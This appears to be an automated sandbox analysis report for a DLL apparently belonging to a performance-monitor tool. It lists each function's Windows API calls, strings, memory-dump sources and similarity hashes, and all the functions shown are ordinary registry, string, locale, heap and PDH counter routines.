Function 6F18E440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,B5D78B91), ref: 6F18E494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6F18E4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,B5D78B91), ref: 6F18E4E0
RegCloseKey.ADVAPI32(00000000), ref: 6F18E4F3

Strings

Advapi32.dll, xrefs: 6F18E48F
RegOpenKeyTransactedW, xrefs: 6F18E4A5

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: aee2df91724049d7c3ab2fdb9bb30f037dc06b7a238c82ae5c0c6181510c3f9e
Instruction ID: 1bbac19b5dbc29aa0a28f753456c2e1bfc679d71025f035f1ba20e7451679fdb
Opcode Fuzzy Hash: aee2df91724049d7c3ab2fdb9bb30f037dc06b7a238c82ae5c0c6181510c3f9e
Instruction Fuzzy Hash: 94319571A04206DFDB10CF95C984BAABBB9FB557A0F104529F829D7280D735A920CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F196698, Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6F19669F
std::_Lockit::_Lockit.LIBCPMT ref: 6F1966A9

Part of subcall function 6F1819B0: std::_Lockit::_Lockit.LIBCPMT ref: 6F1819CD
Part of subcall function 6F1819B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6F1819E9

codecvt.LIBCPMT ref: 6F1966E3
std::_Facet_Register.LIBCPMT ref: 6F1966FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6F19671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6F196738
__EH_prolog3.LIBCMT ref: 6F196745

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Exception@8Facet_RegisterThrowcodecvt
String ID:
API String ID: 790694697-0
Opcode ID: 39a8bd28c3bfbed1943c057c3970bdac92b45e4cca9c63107dcbcca89f697843
Instruction ID: 2d92cbc5f069392e89dd49ebc4c19f4333506eddd86d3f7a6e98212ad783c92c
Opcode Fuzzy Hash: 39a8bd28c3bfbed1943c057c3970bdac92b45e4cca9c63107dcbcca89f697843
Instruction Fuzzy Hash: F431BF75900219DFCB05CF64C954BADB7B1BF543A8F14450DE8556B3D0CB76AA21CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F188BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F188C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F188C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F188C44
SysFreeString.OLEAUT32(00000000), ref: 6F188C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6F188C76
SysFreeString.OLEAUT32(00000000), ref: 6F188C83
SysFreeString.OLEAUT32 ref: 6F188CB2

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 56966bfb87ff89a7ed589ddab4da2ded764f1f2e19e677caef8292e42f7c0e41
Instruction ID: f7a3581f1f36f999ad727124c906f63f5369522b22a37f89ed71f89ae6edbced
Opcode Fuzzy Hash: 56966bfb87ff89a7ed589ddab4da2ded764f1f2e19e677caef8292e42f7c0e41
Instruction Fuzzy Hash: 58112C31649614FBDB109F64CE88FDE7B74EF52BB4F100269F635AA2C4CB716924CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ADFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6F1ADFF9
ext-ms-, xrefs: 6F1AE00D

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9c7e0cb8135ce523e6f07f3ee42dce0a94ec60268d88484831273f4d02a2562e
Instruction ID: f0063a325b653e63ab84a2440d6c729b729c17c71adb8e5bbff07e1274b7a723
Opcode Fuzzy Hash: 9c7e0cb8135ce523e6f07f3ee42dce0a94ec60268d88484831273f4d02a2562e
Instruction Fuzzy Hash: 9D21F935B45625EBC7218A398E80B5B37699F127F0F110211ED24EB280D673FE3087E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1821F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18221D

Part of subcall function 6F1994A7: RaiseException.KERNEL32(?,?,6F196476,000000FF,00000000,00000000,24448D6F,?,?,?,?,6F196476,000000FF,6F1CCD2C,?,000000FF), ref: 6F199507

__CxxThrowException@8.LIBVCRUNTIME ref: 6F182262
___std_exception_copy.LIBVCRUNTIME ref: 6F18228F

Strings

ios_base::badbit set, xrefs: 6F182227, 6F182252, 6F182273
ios_base::failbit set, xrefs: 6F182135, 6F182231
ios_base::eofbit set, xrefs: 6F182236

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 6c0a5fd453011fa135f1cb86a928b0ac24910b82bb6c0c0fb95bc6b37d6c76d6
Instruction ID: 6147aacc486a0ddc08a03e9f3bf82a7e2803793d6f7ff2181e325ae777b6184e
Opcode Fuzzy Hash: 6c0a5fd453011fa135f1cb86a928b0ac24910b82bb6c0c0fb95bc6b37d6c76d6
Instruction Fuzzy Hash: 401105B29007046BC701CF68C941BC6B3E8AF652A0F04861AF968E7180E775B534CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6F1B4BFD: _free.LIBCMT ref: 6F1B4C26

_free.LIBCMT ref: 6F1B4F04

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B4F0F
_free.LIBCMT ref: 6F1B4F1A
_free.LIBCMT ref: 6F1B4F6E
_free.LIBCMT ref: 6F1B4F79
_free.LIBCMT ref: 6F1B4F84
_free.LIBCMT ref: 6F1B4F8F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 1eb41b428b303a5409dda7d672ee23d65a01baa14027d099b8777b59af1a32ad
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: D7112171540B4CEAD620BFB0CD45FCB779C6F04789F808819E39EAA0D0DB77B5658650

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AF447, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6F19E12A,6F19E12A,?,?,?,6F1AF698,00000001,00000001,F9E85006), ref: 6F1AF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6F1AF698,00000001,00000001,F9E85006,?,?,?), ref: 6F1AF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6F1AF621
__freea.LIBCMT ref: 6F1AF62E

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

__freea.LIBCMT ref: 6F1AF637
__freea.LIBCMT ref: 6F1AF65C

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 6fe9d93a4598540f74a0c7f0988dfd1657ff41f4d85580828eacb182a2b5d2fe
Instruction ID: 49a5f6a130ddf8604e42f5de4d63540bab8ea41d4154bcab1fe8d7ed3a7c0d39
Opcode Fuzzy Hash: 6fe9d93a4598540f74a0c7f0988dfd1657ff41f4d85580828eacb182a2b5d2fe
Instruction Fuzzy Hash: 1151E576600206AFEB158E64CC80EAF77ADEF557E4F114629FC28D6190DB36EC61CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F18EEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,B5D78B91,00000000,00000000), ref: 6F18EEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6F18EF1B
CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF34
CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6F18EFAE

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1f826b9ad6ae3c98466b075409f8c17f760d0bd3450f9d27f1eefe68afdf92c2
Instruction ID: df9f3fe8c24353b2b32802d37d080965ac2f3175d2cb0479124a0e5079851b4b
Opcode Fuzzy Hash: 1f826b9ad6ae3c98466b075409f8c17f760d0bd3450f9d27f1eefe68afdf92c2
Instruction Fuzzy Hash: A141F935600116CFCB14DF68C68056AB7F3EF99391F6141AAE864CB354E731AA62CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F184460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F1844A9
std::_Lockit::_Lockit.LIBCPMT ref: 6F1844CB
std::_Lockit::~_Lockit.LIBCPMT ref: 6F1844EB
__Getctype.LIBCPMT ref: 6F184587
std::_Facet_Register.LIBCPMT ref: 6F1845A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6F1845C6

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 67f457a6c62724829859e0443f184d4a9f9abc186905d5c9e7600ca8ab1d581a
Instruction ID: 569ef5ee66bd155ba8107eedb6f563e326a386c7ee816751ee922664cbd33131
Opcode Fuzzy Hash: 67f457a6c62724829859e0443f184d4a9f9abc186905d5c9e7600ca8ab1d581a
Instruction Fuzzy Hash: 8251BF729046148FCB14CF58C680A9EB7F8FF557A4F11416AD829AB281EB30FA25CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F18E530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6F18E440: GetModuleHandleW.KERNEL32(Advapi32.dll,B5D78B91), ref: 6F18E494
Part of subcall function 6F18E440: RegCloseKey.ADVAPI32(00000000), ref: 6F18E4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6F18E592
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6F18E5DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6F18E613
RegCloseKey.ADVAPI32(?), ref: 6F18E628
RegCloseKey.ADVAPI32(?), ref: 6F18E650
RegCloseKey.ADVAPI32(?), ref: 6F18E678

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: a66901a894c05541df6e30dfcdecb056771e1cc60f8f7cb8c84f6d42da7d2a6b
Instruction ID: f90404b00212a4b3c67a7de64dba997aafdd6c75b55dbf1c7a189d2503185850
Opcode Fuzzy Hash: a66901a894c05541df6e30dfcdecb056771e1cc60f8f7cb8c84f6d42da7d2a6b
Instruction Fuzzy Hash: CC416F712043059BD710DF55D894BABB7E8FF99394F00492EF969D7280DB31E9148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F19B2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6F1992CF,6F194EA0,6F195531,?,6F19574E,?,00000001,?,?,00000001,?,6F1CCC28,0000000C,6F195842), ref: 6F19B2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F19B2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F19B2D6
SetLastError.KERNEL32(00000000,6F19574E,?,00000001,?,?,00000001,?,6F1CCC28,0000000C,6F195842,?,00000001,?), ref: 6F19B328

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e4fccfb3204ca8f6781a1d531ae3c1c89e1f2ba7f41b7fa1ab9030ce58990d98
Instruction ID: 202321dda150ef6e877e000e4c37aefe74c92b0848518849b3ddd2d5df0711e6
Opcode Fuzzy Hash: e4fccfb3204ca8f6781a1d531ae3c1c89e1f2ba7f41b7fa1ab9030ce58990d98
Instruction Fuzzy Hash: C601F73220CB129EE70495759C84A6A2A69FF076F9B21032FF574555D0FF177B3042E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F191390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6F18BC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,B5D78B91,00000000,?), ref: 6F18BCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6F1913E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6F191483
PdhCloseQuery.PDH(?,?,00000000), ref: 6F191498

Strings

edit, xrefs: 6F1913E0
0, xrefs: 6F191547

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: d6fac06724866878c6b0943652e2216f6efab536a88fb1adfd6e3e8f92b33712
Instruction ID: ac77268fc42363be80bc5f3ab1696ad474da2d9d8c3343df85a6857ccff537db
Opcode Fuzzy Hash: d6fac06724866878c6b0943652e2216f6efab536a88fb1adfd6e3e8f92b33712
Instruction Fuzzy Hash: 1EA117716003058FD704CF28C890B9AB7B5FF95394F10861DE965AB2A0D771F9A4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1AD196

Strings

., xrefs: 6F1AD39F
*?, xrefs: 6F1AD04F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: a6aa2da860d7d5728bd5c2764c5cd017521a288f23d17d0d70601d4df2032619
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: 5A616DB9D0060ADFDB05CFA8C9808EDFBF6EF58390B24416AD845E7340D732AE518B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F182120, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18221D

Part of subcall function 6F1994A7: RaiseException.KERNEL32(?,?,6F196476,000000FF,00000000,00000000,24448D6F,?,?,?,?,6F196476,000000FF,6F1CCD2C,?,000000FF), ref: 6F199507

__CxxThrowException@8.LIBVCRUNTIME ref: 6F182262
___std_exception_copy.LIBVCRUNTIME ref: 6F18228F

Strings

ios_base::badbit set, xrefs: 6F182227, 6F182252, 6F182273
ios_base::failbit set, xrefs: 6F182135

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: cda90dd3d69d349c71032d2f914376ed32261f2637cb38be1737d3d800f3f7af
Instruction ID: 4ad5fc3e78e908519f089dea737ba31203ac5dbd4e5c6ca0eff26027f46cf70e
Opcode Fuzzy Hash: cda90dd3d69d349c71032d2f914376ed32261f2637cb38be1737d3d800f3f7af
Instruction Fuzzy Hash: DF41E475900208AFC705CF68C940BDEBBB9EF593A4F14861EE524E7680E775B924CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F185D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

Strings

e, xrefs: 6F185DAF

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 9fec0d24e185378fc94bc5712d710c0702b1cd62b34046420fc08c2fe6930611
Instruction ID: 54450241ec606034c10bf1d484c7067bd554a85ae965554f0f5848e16a591fbd
Opcode Fuzzy Hash: 9fec0d24e185378fc94bc5712d710c0702b1cd62b34046420fc08c2fe6930611
Instruction Fuzzy Hash: DA31C8319187458FC302CF3A954451AF7E6AFDA3D4F148B2EF451F3151FB30A8A99A92

Uniqueness

Uniqueness Score: -1.00%

Function 6F191C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6F191C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6F191C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6F191C52

Strings

Performance Monitor - (Reload Configuration), xrefs: 6F191C2C
Performance Monitor - (Edit Configuration), xrefs: 6F191C40

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: b5c42abcd4f5c3fcda15f3541e5026e93b4f6c27356c625c068dd0338719e18e
Instruction ID: d8be514d911f71ac9a54c2ee09848658fb43b82a5534cd0aebdca0197a9f4784
Opcode Fuzzy Hash: b5c42abcd4f5c3fcda15f3541e5026e93b4f6c27356c625c068dd0338719e18e
Instruction Fuzzy Hash: 42F0BE3314021DBBEB01DE849C80FBB7B6DEB49760F144016FB14A6181C375A921ABB4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A6A30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6F1A69E1,6F1A69A9), ref: 6F1A6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F1A6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6F1A69E1,6F1A69A9), ref: 6F1A6A86

Strings

CorExitProcess, xrefs: 6F1A6A5B
mscoree.dll, xrefs: 6F1A6A49

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dc0f7c5f66435e241b647855dff9c1422829f6b2b777ca41284bf4e2b16a531b
Instruction ID: 67c51a0530f3d235d0393d61ff7d9912a223ddecc83831f1b99e0e2d5df98df7
Opcode Fuzzy Hash: dc0f7c5f66435e241b647855dff9c1422829f6b2b777ca41284bf4e2b16a531b
Instruction Fuzzy Hash: 5CF0A434500608FBCF01DFA5C848BEEBFB4EF056A1F014169E815A6150DB365960CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff52c5ba39d68e29abb8c62291fd8c30282745cbd49fc09e674e9ff759a8458
Instruction ID: e4124985a83492196b9471d3182e162a5d26065e5fbd5f237d0b4a1a0f030e1c
Opcode Fuzzy Hash: 9ff52c5ba39d68e29abb8c62291fd8c30282745cbd49fc09e674e9ff759a8458
Instruction Fuzzy Hash: 9A71A739901216DFDB15CF7AC8846EFBB75FF613E0F14422AE4249B180D772AA61C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F194260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,B5D78B91,?,?,00000000,6F1B9E9B,000000FF,?,6F1915EF,00000000), ref: 6F1942B3
PdhCloseQuery.PDH(?,B5D78B91,?,?,00000000,6F1B9E9B,000000FF,?,6F1915EF,00000000), ref: 6F1942DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6F194302
PdhValidatePathW.PDH(?), ref: 6F19435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6F19438A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

